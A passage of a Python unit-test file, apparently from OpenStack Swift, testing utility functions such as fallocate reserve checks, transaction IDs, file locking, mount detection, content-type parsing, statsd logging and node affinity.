self.assertEquals(str(exc), 'FALLOCATE_RESERVE fail 1024 <= 1024')
# Want 1024 reserved, have 512 * 2 free, so fails
utils.FALLOCATE_RESERVE = 1024
StatVFS.f_frsize = 512
StatVFS.f_bavail = 2
exc = None
try:
fallocate(0, 1, 0, ctypes.c_uint64(0))
except OSError as err:
exc = err
self.assertEquals(str(exc), 'FALLOCATE_RESERVE fail 1024 <= 1024')
# Want 2048 reserved, have 1024 * 1 free, so fails
utils.FALLOCATE_RESERVE = 2048
StatVFS.f_frsize = 1024
StatVFS.f_bavail = 1
exc = None
try:
fallocate(0, 1, 0, ctypes.c_uint64(0))
except OSError as err:
exc = err
self.assertEquals(str(exc), 'FALLOCATE_RESERVE fail 1024 <= 2048')
# Want 2048 reserved, have 512 * 2 free, so fails
utils.FALLOCATE_RESERVE = 2048
StatVFS.f_frsize = 512
StatVFS.f_bavail = 2
exc = None
try:
fallocate(0, 1, 0, ctypes.c_uint64(0))
except OSError as err:
exc = err
self.assertEquals(str(exc), 'FALLOCATE_RESERVE fail 1024 <= 2048')
# Want 1023 reserved, have 1024 * 1 free, but file size is 1, so
# fails
utils.FALLOCATE_RESERVE = 1023
StatVFS.f_frsize = 1024
StatVFS.f_bavail = 1
exc = None
try:
fallocate(0, 1, 0, ctypes.c_uint64(1))
except OSError as err:
exc = err
self.assertEquals(str(exc), 'FALLOCATE_RESERVE fail 1023 <= 1023')
# Want 1022 reserved, have 1024 * 1 free, and file size is 1, so
# succeeds
utils.FALLOCATE_RESERVE = 1022
StatVFS.f_frsize = 1024
StatVFS.f_bavail = 1
self.assertEquals(fallocate(0, 1, 0, ctypes.c_uint64(1)), 0)
# Want 1023 reserved, have 1024 * 1 free, and file size is 0, so
# succeeds
utils.FALLOCATE_RESERVE = 1023
StatVFS.f_frsize = 1024
StatVFS.f_bavail = 1
self.assertEquals(fallocate(0, 1, 0, ctypes.c_uint64(0)), 0)
# Want 1024 reserved, have 1024 * 1 free, and even though
# file size is 0, since we're under the reserve, fails
utils.FALLOCATE_RESERVE = 1024
StatVFS.f_frsize = 1024
StatVFS.f_bavail = 1
exc = None
try:
fallocate(0, 1, 0, ctypes.c_uint64(0))
except OSError as err:
exc = err
self.assertEquals(str(exc), 'FALLOCATE_RESERVE fail 1024 <= 1024')
finally:
utils.FALLOCATE_RESERVE = orig_FALLOCATE_RESERVE
utils.os.fstatvfs = orig_fstatvfs
def test_fallocate_func(self):
class FallocateWrapper(object):
def __init__(self):
self.last_call = None
def __call__(self, *args):
self.last_call = list(args)
self.last_call[-1] = self.last_call[-1].value
return 0
orig__sys_fallocate = utils._sys_fallocate
try:
utils._sys_fallocate = FallocateWrapper()
# Ensure fallocate calls _sys_fallocate even with 0 bytes
utils._sys_fallocate.last_call = None
utils.fallocate(1234, 0)
self.assertEquals(utils._sys_fallocate.last_call,
[1234, 1, 0, 0])
# Ensure fallocate calls _sys_fallocate even with negative bytes
utils._sys_fallocate.last_call = None
utils.fallocate(1234, -5678)
self.assertEquals(utils._sys_fallocate.last_call,
[1234, 1, 0, 0])
# Ensure fallocate calls _sys_fallocate properly with positive
# bytes
utils._sys_fallocate.last_call = None
utils.fallocate(1234, 1)
self.assertEquals(utils._sys_fallocate.last_call,
[1234, 1, 0, 1])
utils._sys_fallocate.last_call = None
utils.fallocate(1234, 10 * 1024 * 1024 * 1024)
self.assertEquals(utils._sys_fallocate.last_call,
[1234, 1, 0, 10 * 1024 * 1024 * 1024])
finally:
utils._sys_fallocate = orig__sys_fallocate
def test_generate_trans_id(self):
fake_time = 1366428370.5163341
with patch.object(utils.time, 'time', return_value=fake_time):
trans_id = utils.generate_trans_id('')
self.assertEquals(len(trans_id), 34)
self.assertEquals(trans_id[:2], 'tx')
self.assertEquals(trans_id[23], '-')
self.assertEquals(int(trans_id[24:], 16), int(fake_time))
with patch.object(utils.time, 'time', return_value=fake_time):
trans_id = utils.generate_trans_id('-suffix')
self.assertEquals(len(trans_id), 41)
self.assertEquals(trans_id[:2], 'tx')
self.assertEquals(trans_id[34:], '-suffix')
self.assertEquals(trans_id[23], '-')
self.assertEquals(int(trans_id[24:34], 16), int(fake_time))
def test_get_trans_id_time(self):
ts = utils.get_trans_id_time('tx8c8bc884cdaf499bb29429aa9c46946e')
self.assertEquals(ts, None)
ts = utils.get_trans_id_time('tx1df4ff4f55ea45f7b2ec2-0051720c06')
self.assertEquals(ts, 1366428678)
self.assertEquals(
time.asctime(time.gmtime(ts)) + ' UTC',
'Sat Apr 20 03:31:18 2013 UTC')
ts = utils.get_trans_id_time(
'tx1df4ff4f55ea45f7b2ec2-0051720c06-suffix')
self.assertEquals(ts, 1366428678)
self.assertEquals(
time.asctime(time.gmtime(ts)) + ' UTC',
'Sat Apr 20 03:31:18 2013 UTC')
ts = utils.get_trans_id_time('')
self.assertEquals(ts, None)
ts = utils.get_trans_id_time('garbage')
self.assertEquals(ts, None)
ts = utils.get_trans_id_time('tx1df4ff4f55ea45f7b2ec2-almostright')
self.assertEquals(ts, None)
def test_tpool_reraise(self):
with patch.object(utils.tpool, 'execute', lambda f: f()):
self.assertTrue(
utils.tpool_reraise(MagicMock(return_value='test1')), 'test1')
self.assertRaises(
Exception,
utils.tpool_reraise, MagicMock(side_effect=Exception('test2')))
self.assertRaises(
BaseException,
utils.tpool_reraise,
MagicMock(side_effect=BaseException('test3')))
def test_lock_file(self):
flags = os.O_CREAT | os.O_RDWR
with NamedTemporaryFile(delete=False) as nt:
nt.write("test string")
nt.flush()
nt.close()
with utils.lock_file(nt.name, unlink=False) as f:
self.assertEqual(f.read(), "test string")
# we have a lock, now let's try to get a newer one
fd = os.open(nt.name, flags)
self.assertRaises(IOError, fcntl.flock, fd,
fcntl.LOCK_EX | fcntl.LOCK_NB)
with utils.lock_file(nt.name, unlink=False, append=True) as f:
self.assertEqual(f.read(), "test string")
f.seek(0)
f.write("\nanother string")
f.flush()
f.seek(0)
self.assertEqual(f.read(), "test string\nanother string")
# we have a lock, now let's try to get a newer one
fd = os.open(nt.name, flags)
self.assertRaises(IOError, fcntl.flock, fd,
fcntl.LOCK_EX | fcntl.LOCK_NB)
with utils.lock_file(nt.name, timeout=3, unlink=False) as f:
try:
with utils.lock_file(
nt.name, timeout=1, unlink=False) as f:
self.assertTrue(
False, "Expected LockTimeout exception")
except LockTimeout:
pass
with utils.lock_file(nt.name, unlink=True) as f:
self.assertEqual(f.read(), "test string\nanother string")
# we have a lock, now let's try to get a newer one
fd = os.open(nt.name, flags)
self.assertRaises(
IOError, fcntl.flock, fd, fcntl.LOCK_EX | fcntl.LOCK_NB)
self.assertRaises(OSError, os.remove, nt.name)
def test_ismount_path_does_not_exist(self):
tmpdir = mkdtemp()
try:
self.assertFalse(utils.ismount(os.path.join(tmpdir, 'bar')))
finally:
shutil.rmtree(tmpdir)
def test_ismount_path_not_mount(self):
tmpdir = mkdtemp()
try:
self.assertFalse(utils.ismount(tmpdir))
finally:
shutil.rmtree(tmpdir)
def test_ismount_path_error(self):
def _mock_os_lstat(path):
raise OSError(13, "foo")
tmpdir = mkdtemp()
try:
with patch("os.lstat", _mock_os_lstat):
self.assertRaises(OSError, utils.ismount, tmpdir)
finally:
shutil.rmtree(tmpdir)
def test_ismount_path_is_symlink(self):
tmpdir = mkdtemp()
try:
link = os.path.join(tmpdir, "tmp")
os.symlink("/tmp", link)
self.assertFalse(utils.ismount(link))
finally:
shutil.rmtree(tmpdir)
def test_ismount_path_is_root(self):
self.assertTrue(utils.ismount('/'))
def test_ismount_parent_path_error(self):
_os_lstat = os.lstat
def _mock_os_lstat(path):
if path.endswith(".."):
raise OSError(13, "foo")
else:
return _os_lstat(path)
tmpdir = mkdtemp()
try:
with patch("os.lstat", _mock_os_lstat):
self.assertRaises(OSError, utils.ismount, tmpdir)
finally:
shutil.rmtree(tmpdir)
def test_ismount_successes_dev(self):
_os_lstat = os.lstat
class MockStat(object):
def __init__(self, mode, dev, ino):
self.st_mode = mode
self.st_dev = dev
self.st_ino = ino
def _mock_os_lstat(path):
if path.endswith(".."):
parent = _os_lstat(path)
return MockStat(parent.st_mode, parent.st_dev + 1,
parent.st_ino)
else:
return _os_lstat(path)
tmpdir = mkdtemp()
try:
with patch("os.lstat", _mock_os_lstat):
self.assertTrue(utils.ismount(tmpdir))
finally:
shutil.rmtree(tmpdir)
def test_ismount_successes_ino(self):
_os_lstat = os.lstat
class MockStat(object):
def __init__(self, mode, dev, ino):
self.st_mode = mode
self.st_dev = dev
self.st_ino = ino
def _mock_os_lstat(path):
if path.endswith(".."):
return _os_lstat(path)
else:
parent_path = os.path.join(path, "..")
child = _os_lstat(path)
parent = _os_lstat(parent_path)
return MockStat(child.st_mode, parent.st_ino,
child.st_dev)
tmpdir = mkdtemp()
try:
with patch("os.lstat", _mock_os_lstat):
self.assertTrue(utils.ismount(tmpdir))
finally:
shutil.rmtree(tmpdir)
def test_parse_content_type(self):
self.assertEquals(utils.parse_content_type('text/plain'),
('text/plain', []))
self.assertEquals(utils.parse_content_type('text/plain;charset=utf-8'),
('text/plain', [('charset', 'utf-8')]))
self.assertEquals(
utils.parse_content_type('text/plain;hello="world";charset=utf-8'),
('text/plain', [('hello', '"world"'), ('charset', 'utf-8')]))
self.assertEquals(
utils.parse_content_type('text/plain; hello="world"; a=b'),
('text/plain', [('hello', '"world"'), ('a', 'b')]))
self.assertEquals(
utils.parse_content_type(r'text/plain; x="\""; a=b'),
('text/plain', [('x', r'"\""'), ('a', 'b')]))
self.assertEquals(
utils.parse_content_type(r'text/plain; x; a=b'),
('text/plain', [('x', ''), ('a', 'b')]))
self.assertEquals(
utils.parse_content_type(r'text/plain; x="\""; a'),
('text/plain', [('x', r'"\""'), ('a', '')]))
def test_override_bytes_from_content_type(self):
listing_dict = {
'bytes': 1234, 'hash': 'asdf', 'name': 'zxcv',
'content_type': 'text/plain; hello="world"; swift_bytes=15'}
utils.override_bytes_from_content_type(listing_dict,
logger=FakeLogger())
self.assertEquals(listing_dict['bytes'], 15)
self.assertEquals(listing_dict['content_type'],
'text/plain;hello="world"')
listing_dict = {
'bytes': 1234, 'hash': 'asdf', 'name': 'zxcv',
'content_type': 'text/plain; hello="world"; swift_bytes=hey'}
utils.override_bytes_from_content_type(listing_dict,
logger=FakeLogger())
self.assertEquals(listing_dict['bytes'], 1234)
self.assertEquals(listing_dict['content_type'],
'text/plain;hello="world"')
def test_quote(self):
res = utils.quote('/v1/a/c3/subdirx/')
assert res == '/v1/a/c3/subdirx/'
res = utils.quote('/v1/a&b/c3/subdirx/')
assert res == '/v1/a%26b/c3/subdirx/'
res = utils.quote('/v1/a&b/c3/subdirx/', safe='&')
assert res == '%2Fv1%2Fa&b%2Fc3%2Fsubdirx%2F'
unicode_sample = u'\uc77c\uc601'
account = 'abc_' + unicode_sample
valid_utf8_str = utils.get_valid_utf8_str(account)
account = 'abc_' + unicode_sample.encode('utf-8')[::-1]
invalid_utf8_str = utils.get_valid_utf8_str(account)
self.assertEquals('abc_%EC%9D%BC%EC%98%81',
utils.quote(valid_utf8_str))
self.assertEquals('abc_%EF%BF%BD%EF%BF%BD%EC%BC%9D%EF%BF%BD',
utils.quote(invalid_utf8_str))
def test_get_hmac(self):
self.assertEquals(
utils.get_hmac('GET', '/path', 1, 'abc'),
'b17f6ff8da0e251737aa9e3ee69a881e3e092e2f')
class TestSwiftInfo(unittest.TestCase):
def tearDown(self):
utils._swift_info = {}
utils._swift_admin_info = {}
def test_register_swift_info(self):
utils.register_swift_info(foo='bar')
utils.register_swift_info(lorem='ipsum')
utils.register_swift_info('cap1', cap1_foo='cap1_bar')
utils.register_swift_info('cap1', cap1_lorem='cap1_ipsum')
self.assertTrue('swift' in utils._swift_info)
self.assertTrue('foo' in utils._swift_info['swift'])
self.assertEqual(utils._swift_info['swift']['foo'], 'bar')
self.assertTrue('lorem' in utils._swift_info['swift'])
self.assertEqual(utils._swift_info['swift']['lorem'], 'ipsum')
self.assertTrue('cap1' in utils._swift_info)
self.assertTrue('cap1_foo' in utils._swift_info['cap1'])
self.assertEqual(utils._swift_info['cap1']['cap1_foo'], 'cap1_bar')
self.assertTrue('cap1_lorem' in utils._swift_info['cap1'])
self.assertEqual(utils._swift_info['cap1']['cap1_lorem'], 'cap1_ipsum')
self.assertRaises(ValueError,
utils.register_swift_info, 'admin', foo='bar')
self.assertRaises(ValueError,
utils.register_swift_info, 'disallowed_sections',
disallowed_sections=None)
def test_get_swift_info(self):
utils._swift_info = {'swift': {'foo': 'bar'},
'cap1': {'cap1_foo': 'cap1_bar'}}
utils._swift_admin_info = {'admin_cap1': {'ac1_foo': 'ac1_bar'}}
info = utils.get_swift_info()
self.assertTrue('admin' not in info)
self.assertTrue('swift' in info)
self.assertTrue('foo' in info['swift'])
self.assertEqual(utils._swift_info['swift']['foo'], 'bar')
self.assertTrue('cap1' in info)
self.assertTrue('cap1_foo' in info['cap1'])
self.assertEqual(utils._swift_info['cap1']['cap1_foo'], 'cap1_bar')
def test_get_swift_info_with_disallowed_sections(self):
utils._swift_info = {'swift': {'foo': 'bar'},
'cap1': {'cap1_foo': 'cap1_bar'},
'cap2': {'cap2_foo': 'cap2_bar'},
'cap3': {'cap3_foo': 'cap3_bar'}}
utils._swift_admin_info = {'admin_cap1': {'ac1_foo': 'ac1_bar'}}
info = utils.get_swift_info(disallowed_sections=['cap1', 'cap3'])
self.assertTrue('admin' not in info)
self.assertTrue('swift' in info)
self.assertTrue('foo' in info['swift'])
self.assertEqual(info['swift']['foo'], 'bar')
self.assertTrue('cap1' not in info)
self.assertTrue('cap2' in info)
self.assertTrue('cap2_foo' in info['cap2'])
self.assertEqual(info['cap2']['cap2_foo'], 'cap2_bar')
self.assertTrue('cap3' not in info)
def test_register_swift_admin_info(self):
utils.register_swift_info(admin=True, admin_foo='admin_bar')
utils.register_swift_info(admin=True, admin_lorem='admin_ipsum')
utils.register_swift_info('cap1', admin=True, ac1_foo='ac1_bar')
utils.register_swift_info('cap1', admin=True, ac1_lorem='ac1_ipsum')
self.assertTrue('swift' in utils._swift_admin_info)
self.assertTrue('admin_foo' in utils._swift_admin_info['swift'])
self.assertEqual(
utils._swift_admin_info['swift']['admin_foo'], 'admin_bar')
self.assertTrue('admin_lorem' in utils._swift_admin_info['swift'])
self.assertEqual(
utils._swift_admin_info['swift']['admin_lorem'], 'admin_ipsum')
self.assertTrue('cap1' in utils._swift_admin_info)
self.assertTrue('ac1_foo' in utils._swift_admin_info['cap1'])
self.assertEqual(
utils._swift_admin_info['cap1']['ac1_foo'], 'ac1_bar')
self.assertTrue('ac1_lorem' in utils._swift_admin_info['cap1'])
self.assertEqual(
utils._swift_admin_info['cap1']['ac1_lorem'], 'ac1_ipsum')
self.assertTrue('swift' not in utils._swift_info)
self.assertTrue('cap1' not in utils._swift_info)
def test_get_swift_admin_info(self):
utils._swift_info = {'swift': {'foo': 'bar'},
'cap1': {'cap1_foo': 'cap1_bar'}}
utils._swift_admin_info = {'admin_cap1': {'ac1_foo': 'ac1_bar'}}
info = utils.get_swift_info(admin=True)
self.assertTrue('admin' in info)
self.assertTrue('admin_cap1' in info['admin'])
self.assertTrue('ac1_foo' in info['admin']['admin_cap1'])
self.assertEqual(info['admin']['admin_cap1']['ac1_foo'], 'ac1_bar')
self.assertTrue('swift' in info)
self.assertTrue('foo' in info['swift'])
self.assertEqual(utils._swift_info['swift']['foo'], 'bar')
self.assertTrue('cap1' in info)
self.assertTrue('cap1_foo' in info['cap1'])
self.assertEqual(utils._swift_info['cap1']['cap1_foo'], 'cap1_bar')
def test_get_swift_admin_info_with_disallowed_sections(self):
utils._swift_info = {'swift': {'foo': 'bar'},
'cap1': {'cap1_foo': 'cap1_bar'},
'cap2': {'cap2_foo': 'cap2_bar'},
'cap3': {'cap3_foo': 'cap3_bar'}}
utils._swift_admin_info = {'admin_cap1': {'ac1_foo': 'ac1_bar'}}
info = utils.get_swift_info(
admin=True, disallowed_sections=['cap1', 'cap3'])
self.assertTrue('admin' in info)
self.assertTrue('admin_cap1' in info['admin'])
self.assertTrue('ac1_foo' in info['admin']['admin_cap1'])
self.assertEqual(info['admin']['admin_cap1']['ac1_foo'], 'ac1_bar')
self.assertTrue('disallowed_sections' in info['admin'])
self.assertTrue('cap1' in info['admin']['disallowed_sections'])
self.assertTrue('cap2' not in info['admin']['disallowed_sections'])
self.assertTrue('cap3' in info['admin']['disallowed_sections'])
self.assertTrue('swift' in info)
self.assertTrue('foo' in info['swift'])
self.assertEqual(info['swift']['foo'], 'bar')
self.assertTrue('cap1' not in info)
self.assertTrue('cap2' in info)
self.assertTrue('cap2_foo' in info['cap2'])
self.assertEqual(info['cap2']['cap2_foo'], 'cap2_bar')
self.assertTrue('cap3' not in info)
class TestFileLikeIter(unittest.TestCase):
def test_iter_file_iter(self):
in_iter = ['abc', 'de', 'fghijk', 'l']
chunks = []
for chunk in utils.FileLikeIter(in_iter):
chunks.append(chunk)
self.assertEquals(chunks, in_iter)
def test_next(self):
in_iter = ['abc', 'de', 'fghijk', 'l']
chunks = []
iter_file = utils.FileLikeIter(in_iter)
while True:
try:
chunk = iter_file.next()
except StopIteration:
break
chunks.append(chunk)
self.assertEquals(chunks, in_iter)
def test_read(self):
in_iter = ['abc', 'de', 'fghijk', 'l']
iter_file = utils.FileLikeIter(in_iter)
self.assertEquals(iter_file.read(), ''.join(in_iter))
def test_read_with_size(self):
in_iter = ['abc', 'de', 'fghijk', 'l']
chunks = []
iter_file = utils.FileLikeIter(in_iter)
while True:
chunk = iter_file.read(2)
if not chunk:
break
self.assertTrue(len(chunk) <= 2)
chunks.append(chunk)
self.assertEquals(''.join(chunks), ''.join(in_iter))
def test_read_with_size_zero(self):
# makes little sense, but file supports it, so...
self.assertEquals(utils.FileLikeIter('abc').read(0), '')
def test_readline(self):
in_iter = ['abc\n', 'd', '\nef', 'g\nh', '\nij\n\nk\n', 'trailing.']
lines = []
iter_file = utils.FileLikeIter(in_iter)
while True:
line = iter_file.readline()
if not line:
break
lines.append(line)
self.assertEquals(
lines,
[v if v == 'trailing.' else v + '\n'
for v in ''.join(in_iter).split('\n')])
def test_readline2(self):
self.assertEquals(
utils.FileLikeIter(['abc', 'def\n']).readline(4),
'abcd')
def test_readline3(self):
self.assertEquals(
utils.FileLikeIter(['a' * 1111, 'bc\ndef']).readline(),
('a' * 1111) + 'bc\n')
def test_readline_with_size(self):
in_iter = ['abc\n', 'd', '\nef', 'g\nh', '\nij\n\nk\n', 'trailing.']
lines = []
iter_file = utils.FileLikeIter(in_iter)
while True:
line = iter_file.readline(2)
if not line:
break
lines.append(line)
self.assertEquals(
lines,
['ab', 'c\n', 'd\n', 'ef', 'g\n', 'h\n', 'ij', '\n', '\n', 'k\n',
'tr', 'ai', 'li', 'ng', '.'])
def test_readlines(self):
in_iter = ['abc\n', 'd', '\nef', 'g\nh', '\nij\n\nk\n', 'trailing.']
lines = utils.FileLikeIter(in_iter).readlines()
self.assertEquals(
lines,
[v if v == 'trailing.' else v + '\n'
for v in ''.join(in_iter).split('\n')])
def test_readlines_with_size(self):
in_iter = ['abc\n', 'd', '\nef', 'g\nh', '\nij\n\nk\n', 'trailing.']
iter_file = utils.FileLikeIter(in_iter)
lists_of_lines = []
while True:
lines = iter_file.readlines(2)
if not lines:
break
lists_of_lines.append(lines)
self.assertEquals(
lists_of_lines,
[['ab'], ['c\n'], ['d\n'], ['ef'], ['g\n'], ['h\n'], ['ij'],
['\n', '\n'], ['k\n'], ['tr'], ['ai'], ['li'], ['ng'], ['.']])
def test_close(self):
iter_file = utils.FileLikeIter('abcdef')
self.assertEquals(iter_file.next(), 'a')
iter_file.close()
self.assertTrue(iter_file.closed)
self.assertRaises(ValueError, iter_file.next)
self.assertRaises(ValueError, iter_file.read)
self.assertRaises(ValueError, iter_file.readline)
self.assertRaises(ValueError, iter_file.readlines)
# Just make sure repeated close calls don't raise an Exception
iter_file.close()
self.assertTrue(iter_file.closed)
class TestStatsdLogging(unittest.TestCase):
def test_get_logger_statsd_client_not_specified(self):
logger = utils.get_logger({}, 'some-name', log_route='some-route')
# white-box construction validation
self.assertEqual(None, logger.logger.statsd_client)
def test_get_logger_statsd_client_defaults(self):
logger = utils.get_logger({'log_statsd_host': 'some.host.com'},
'some-name', log_route='some-route')
# white-box construction validation
self.assert_(isinstance(logger.logger.statsd_client,
utils.StatsdClient))
self.assertEqual(logger.logger.statsd_client._host, 'some.host.com')
self.assertEqual(logger.logger.statsd_client._port, 8125)
self.assertEqual(logger.logger.statsd_client._prefix, 'some-name.')
self.assertEqual(logger.logger.statsd_client._default_sample_rate, 1)
logger.set_statsd_prefix('some-name.more-specific')
self.assertEqual(logger.logger.statsd_client._prefix,
'some-name.more-specific.')
logger.set_statsd_prefix('')
self.assertEqual(logger.logger.statsd_client._prefix, '')
def test_get_logger_statsd_client_non_defaults(self):
logger = utils.get_logger({
'log_statsd_host': 'another.host.com',
'log_statsd_port': '9876',
'log_statsd_default_sample_rate': '0.75',
'log_statsd_sample_rate_factor': '0.81',
'log_statsd_metric_prefix': 'tomato.sauce',
}, 'some-name', log_route='some-route')
self.assertEqual(logger.logger.statsd_client._prefix,
'tomato.sauce.some-name.')
logger.set_statsd_prefix('some-name.more-specific')
self.assertEqual(logger.logger.statsd_client._prefix,
'tomato.sauce.some-name.more-specific.')
logger.set_statsd_prefix('')
self.assertEqual(logger.logger.statsd_client._prefix, 'tomato.sauce.')
self.assertEqual(logger.logger.statsd_client._host, 'another.host.com')
self.assertEqual(logger.logger.statsd_client._port, 9876)
self.assertEqual(logger.logger.statsd_client._default_sample_rate,
0.75)
self.assertEqual(logger.logger.statsd_client._sample_rate_factor,
0.81)
def test_sample_rates(self):
logger = utils.get_logger({'log_statsd_host': 'some.host.com'})
mock_socket = MockUdpSocket()
# encapsulation? what's that?
statsd_client = logger.logger.statsd_client
self.assertTrue(statsd_client.random is random.random)
statsd_client._open_socket = lambda *_: mock_socket
statsd_client.random = lambda: 0.50001
logger.increment('tribbles', sample_rate=0.5)
self.assertEqual(len(mock_socket.sent), 0)
statsd_client.random = lambda: 0.49999
logger.increment('tribbles', sample_rate=0.5)
self.assertEqual(len(mock_socket.sent), 1)
payload = mock_socket.sent[0][0]
self.assertTrue(payload.endswith("|@0.5"))
def test_sample_rates_with_sample_rate_factor(self):
logger = utils.get_logger({
'log_statsd_host': 'some.host.com',
'log_statsd_default_sample_rate': '0.82',
'log_statsd_sample_rate_factor': '0.91',
})
effective_sample_rate = 0.82 * 0.91
mock_socket = MockUdpSocket()
# encapsulation? what's that?
statsd_client = logger.logger.statsd_client
self.assertTrue(statsd_client.random is random.random)
statsd_client._open_socket = lambda *_: mock_socket
statsd_client.random = lambda: effective_sample_rate + 0.001
logger.increment('tribbles')
self.assertEqual(len(mock_socket.sent), 0)
statsd_client.random = lambda: effective_sample_rate - 0.001
logger.increment('tribbles')
self.assertEqual(len(mock_socket.sent), 1)
payload = mock_socket.sent[0][0]
self.assertTrue(payload.endswith("|@%s" % effective_sample_rate),
payload)
effective_sample_rate = 0.587 * 0.91
statsd_client.random = lambda: effective_sample_rate - 0.001
logger.increment('tribbles', sample_rate=0.587)
self.assertEqual(len(mock_socket.sent), 2)
payload = mock_socket.sent[1][0]
self.assertTrue(payload.endswith("|@%s" % effective_sample_rate),
payload)
def test_timing_stats(self):
class MockController(object):
def __init__(self, status):
self.status = status
self.logger = self
self.args = ()
self.called = 'UNKNOWN'
def timing_since(self, *args):
self.called = 'timing'
self.args = args
@utils.timing_stats()
def METHOD(controller):
return Response(status=controller.status)
mock_controller = MockController(200)
METHOD(mock_controller)
self.assertEquals(mock_controller.called, 'timing')
self.assertEquals(len(mock_controller.args), 2)
self.assertEquals(mock_controller.args[0], 'METHOD.timing')
self.assert_(mock_controller.args[1] > 0)
mock_controller = MockController(404)
METHOD(mock_controller)
self.assertEquals(len(mock_controller.args), 2)
self.assertEquals(mock_controller.called, 'timing')
self.assertEquals(mock_controller.args[0], 'METHOD.timing')
self.assert_(mock_controller.args[1] > 0)
mock_controller = MockController(401)
METHOD(mock_controller)
self.assertEquals(len(mock_controller.args), 2)
self.assertEquals(mock_controller.called, 'timing')
self.assertEquals(mock_controller.args[0], 'METHOD.errors.timing')
self.assert_(mock_controller.args[1] > 0)
class UnsafeXrange(object):
"""
Like xrange(limit), but with extra context switching to screw things up.
"""
def __init__(self, upper_bound):
self.current = 0
self.concurrent_calls = 0
self.upper_bound = upper_bound
def __iter__(self):
return self
def next(self):
if self.concurrent_calls > 0:
raise ValueError("concurrent access is bad, mmmkay? (%r)")
self.concurrent_calls += 1
try:
if self.current >= self.upper_bound:
raise StopIteration
else:
val = self.current
self.current += 1
eventlet.sleep() # yield control
return val
finally:
self.concurrent_calls -= 1
class TestAffinityKeyFunction(unittest.TestCase):
def setUp(self):
self.nodes = [dict(id=0, region=1, zone=1),
dict(id=1, region=1, zone=2),
dict(id=2, region=2, zone=1),
dict(id=3, region=2, zone=2),
dict(id=4, region=3, zone=1),
dict(id=5, region=3, zone=2),
dict(id=6, region=4, zone=0),
dict(id=7, region=4, zone=1)]
def test_single_region(self):
keyfn = utils.affinity_key_function("r3=1")
ids = [n['id'] for n in sorted(self.nodes, key=keyfn)]
self.assertEqual([4, 5, 0, 1, 2, 3, 6, 7], ids)
def test_bogus_value(self):
self.assertRaises(ValueError,
utils.affinity_key_function, "r3")
self.assertRaises(ValueError,
utils.affinity_key_function, "r3=elephant")
def test_empty_value(self):
# Empty's okay, it just means no preference
keyfn = utils.affinity_key_function("")
self.assert_(callable(keyfn))
ids = [n['id'] for n in sorted(self.nodes, key=keyfn)]
self.assertEqual([0, 1, 2, 3, 4, 5, 6, 7], ids)
def test_all_whitespace_value(self):
# Empty's okay, it just means no preference
keyfn = utils.affinity_key_function(" \n")
self.assert_(callable(keyfn))
ids = [n['id'] for n in sorted(self.nodes, key=keyfn)]
self.assertEqual([0, 1, 2, 3, 4, 5, 6, 7], ids)
def test_with_zone_zero(self):
keyfn = utils.affinity_key_function("r4z0=1")
ids = [n['id'] for n in sorted(self.nodes, key=keyfn)]
self.assertEqual([6, 0, 1, 2, 3, 4, 5, 7], ids)
def test_multiple(self):
keyfn = utils.affinity_key_function("r1=100, r4=200, r3z1=1")
ids = [n['id'] for n in sorted(self.nodes, key=keyfn)]
self.assertEqual([4, 0, 1, 6, 7, 2, 3, 5], ids)
def test_more_specific_after_less_specific(self):
keyfn = utils.affinity_key_function("r2=100, r2z2=50")
ids = [n['id'] for n in sorted(self.nodes, key=keyfn)]
self.assertEqual([3, 2, 0, 1, 4, 5, 6, 7], ids)
class TestAffinityLocalityPredicate(unittest.TestCase):
def setUp(self):
self.nodes = [dict(id=0, region=1, zone=1),
dict(id=1, region=1, zone=2),
dict(id=2, region=2, zone=1),
dict(id=3, region=2, zone=2),
dict(id=4, region=3, zone=1),
dict(id=5, region=3, zone=2),
dict(id=6, region=4, zone=0),
dict(id=7, region=4, zone=1)]
def test_empty(self):
pred = utils.affinity_locality_predicate('')
self.assert_(pred is None)
def test_region(self):
pred = utils.affinity_locality_predicate('r1')
self.assert_(callable(pred))
ids = [n['id'] for n in self.nodes if pred(n)]
self.assertEqual([0, 1], ids)
def test_zone(self):
pred = utils.affinity_locality_predicate('r1z1')
self.assert_(callable(pred))
ids = [n['id'] for n in self.nodes if pred(n)]
self.assertEqual([0], ids)
def test_multiple(self):
pred = utils.affinity_locality_predicate('r1, r3, r4z0')
self.assert_(callable(pred))
ids = [n['id'] for n in self.nodes if pred(n)]
self.assertEqual([0, 1, 4, 5, 6], ids)
def test_invalid(self):
self.assertRaises(ValueError,
utils.affinity_locality_predicate, 'falafel')
self.assertRaises(ValueError,
utils.affinity_locality_predicate, 'r8zQ')
self.assertRaises(ValueError,
utils.affinity_locality_predicate, 'r2d2')
self.assertRaises(ValueError,
utils.affinity_locality_predicate, 'r1z1=1')
class TestGreenthreadSafeIterator(unittest.TestCase):
def increment(self, iterable):
plus_ones = []
for n in iterable:
plus_ones.append(n + 1)
return plus_ones
def test_setup_works(self):
# it should work without concurrent access
self.assertEquals([0, 1, 2, 3], list(UnsafeXrange(4)))
iterable = UnsafeXrange(10)
pile = eventlet.GreenPile(2)
for _ in xrange(2):
pile.spawn(self.increment, iterable)
try:
sorted([resp for resp in pile])
self.assertTrue(False, "test setup is insufficiently crazy")
except ValueError:
pass
def test_access_is_serialized(self):
pile = eventlet.GreenPile(2)
iterable = utils.GreenthreadSafeIterator(UnsafeXrange(10))
for _ in xrange(2):
pile.spawn(self.increment, iterable)
response = sorted(sum([resp for resp in pile], []))
self.assertEquals(range(1, 11), response)
class TestStatsdLoggingDelegation(unittest.TestCase):
def setUp(self):
self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.sock.bind(('localhost', 0))
self.port = self.sock.getsockname()[1]
self.queue = Queue()
self.reader_thread = threading.Thread(target=self.statsd_reader)
self.reader_thread.setDaemon(1)
self.reader_thread.start()
def tearDown(self):
# The "no-op when disabled" test doesn't set up a real logger, so
# create one here so we can tell the reader thread to stop.
if not getattr(self, 'logger', None):
self.logger = utils.get_logger({
'log_statsd_host': 'localhost',
'log_statsd_port': str(self.port),
}, 'some-name')
self.logger.increment('STOP')
self.reader_thread.join(timeout=4)
self.sock.close()
del self.logger
def statsd_reader(self):
while True:
try:
payload = self.sock.recv(4096)
if payload and 'STOP' in payload:
return 42
self.queue.put(payload)
except Exception as e:
sys.stderr.write('statsd_reader thread: %r' % (e,))
break
def _send_and_get(self, sender_fn, *args, **kwargs):
"""
Because the client library may not actually send a packet with
sample_rate < 1, we keep trying until we get one through.
"""
got = None
while not got:
sender_fn(*args, **kwargs)
try:
got = self.queue.get(timeout=0.5)
except Empty:
pass
return got
